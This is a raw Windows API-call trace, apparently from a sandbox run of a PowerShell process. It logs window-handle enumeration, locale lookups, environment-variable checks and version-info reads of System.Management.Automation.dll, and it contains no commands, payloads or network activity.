	[0447.076] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x460
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x44c
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x778
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x460
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x558
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x15bc
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x15a0
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x159c
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1598
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1594
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1590
	[0447.077] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x158c
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1588
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1584
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1580
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x157c
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1488
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1404
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x11b8
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xbd4
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe0c
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xd30
	[0447.078] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe70
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x13b8
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe20
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe2c
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe00
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe04
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc94
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x13b0
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x13ac
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x13a8
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1374
	[0447.079] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x132c
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1328
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x12d0
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x12cc
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x12c8
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1290
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1218
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1214
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x11ec
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x11e8
	[0447.080] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x11cc
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1140
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe6c
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x6e8
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc6c
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf94
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xffc
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf74
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf08
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf0c
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xed8
	[0447.081] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe90
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xea8
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfa8
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfbc
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfb8
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfb4
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfb0
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfac
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfc0
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfd0
	[0447.082] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf88
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf84
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf80
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xde0
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xddc
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xdd8
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xd34
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xd10
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xd0c
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc9c
	[0447.083] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc74
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc1c
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc08
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xabc
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x24c
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xbb0
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xbfc
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb10
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x374
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x368
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb28
	[0447.084] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xae8
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb14
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x95c
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa8c
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x46c
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb3c
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa90
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xad0
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa9c
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xaa0
	[0447.085] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb1c
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x7e0
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa74
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x694
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa28
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x9b0
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x8d8
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x940
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x93c
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4ec
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x150
	[0447.086] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x720
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x3c4
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x7d4
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x6c8
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb54
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb54
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb5c
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x838
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x818
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x5b8
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x494
	[0447.087] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1ec
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x440
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x7e8
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x730
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x2c8
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x31c
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x330
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x128
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x5c8
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x6f8
	[0447.088] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x358
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x73c
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb0
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x250
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x240
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x790
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x61c
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x568
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x538
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x540
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x460
	[0447.089] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x79c
	[0447.090] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4e0
	[0447.090] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x460
	[0447.090] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x778
	[0447.093] WerSetFlags () returned 0x0
	[0447.336] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0447.337] CoTaskMemFree (pv=0x0) 
	[0447.338] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dd20 | out: pulNumLanguages=0x24dd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dd20) returned 1
	[0447.338] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dd28, pwszLanguagesBuffer=0x2d561a8, pcchLanguagesBuffer=0x24dd20 | out: pulNumLanguages=0x24dd28, pwszLanguagesBuffer=0x2d561a8, pcchLanguagesBuffer=0x24dd20) returned 1
	[0447.343] CoTaskMemAlloc (cb=0x24) returned 0x45b720
	[0447.343] GetUserDefaultLocaleName (in: lpLocaleName=0x45b720, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0447.343] CoTaskMemFree (pv=0x45b720) 
	[0447.364] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0447.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.364] CoTaskMemFree (pv=0x41caa0) 
	[0447.366] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0447.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.366] CoTaskMemFree (pv=0x41caa0) 
	[0447.368] CoTaskMemAlloc (cb=0x104) returned 0x41caa0
	[0447.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41caa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0447.368] CoTaskMemFree (pv=0x41caa0) 
	[0447.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0447.377] SetErrorMode (uMode=0x1) returned 0x1
	[0447.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24d9a0 | out: lpFileInformation=0x24d9a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0447.377] SetErrorMode (uMode=0x1) returned 0x1
	[0447.377] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dc10 | out: lpdwHandle=0x24dc10) returned 0x94c
	[0447.378] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d59a38 | out: lpData=0x2d59a38) returned 1
	[0447.379] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24db88, puLen=0x24db80 | out: lplpBuffer=0x24db88*=0x2d59ad4, puLen=0x24db80) returned 1
	[0447.379] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59bb0, puLen=0x24daf0) returned 1
	[0447.379] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0447.379] CoTaskMemAlloc (cb=0x2e) returned 0x464d70
	[0447.379] lstrcpyW (in: lpString1=0x464d70, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0447.379] CoTaskMemFree (pv=0x464d70) 
	[0447.379] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59c04, puLen=0x24daf0) returned 1
	[0447.379] lstrlenW (lpString="System.Management.Automation") returned 28
	[0447.379] CoTaskMemAlloc (cb=0x3c) returned 0x399900
	[0447.379] lstrcpyW (in: lpString1=0x399900, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0447.379] CoTaskMemFree (pv=0x399900) 
	[0447.379] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59c60, puLen=0x24daf0) returned 1
	[0447.379] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0447.379] CoTaskMemAlloc (cb=0x20) returned 0x465c80
	[0447.379] lstrcpyW (in: lpString1=0x465c80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0447.379] CoTaskMemFree (pv=0x465c80) 
	[0447.379] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59ca0, puLen=0x24daf0) returned 1
	[0447.380] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0447.380] CoTaskMemAlloc (cb=0x44) returned 0x399900
	[0447.380] lstrcpyW (in: lpString1=0x399900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0447.645] CoTaskMemFree (pv=0x399900) 
	[0447.645] VerQueryValueW (in: pBlock=0x2d59a38, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24daf8, puLen=0x24daf0 | out: lplpBuffer=0x24daf8*=0x2d59d08, puLen=0x24daf0) returned 1
	[0447.646] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0447.646] CoTaskMemAlloc (cb=0x76) returned 0x4031a0
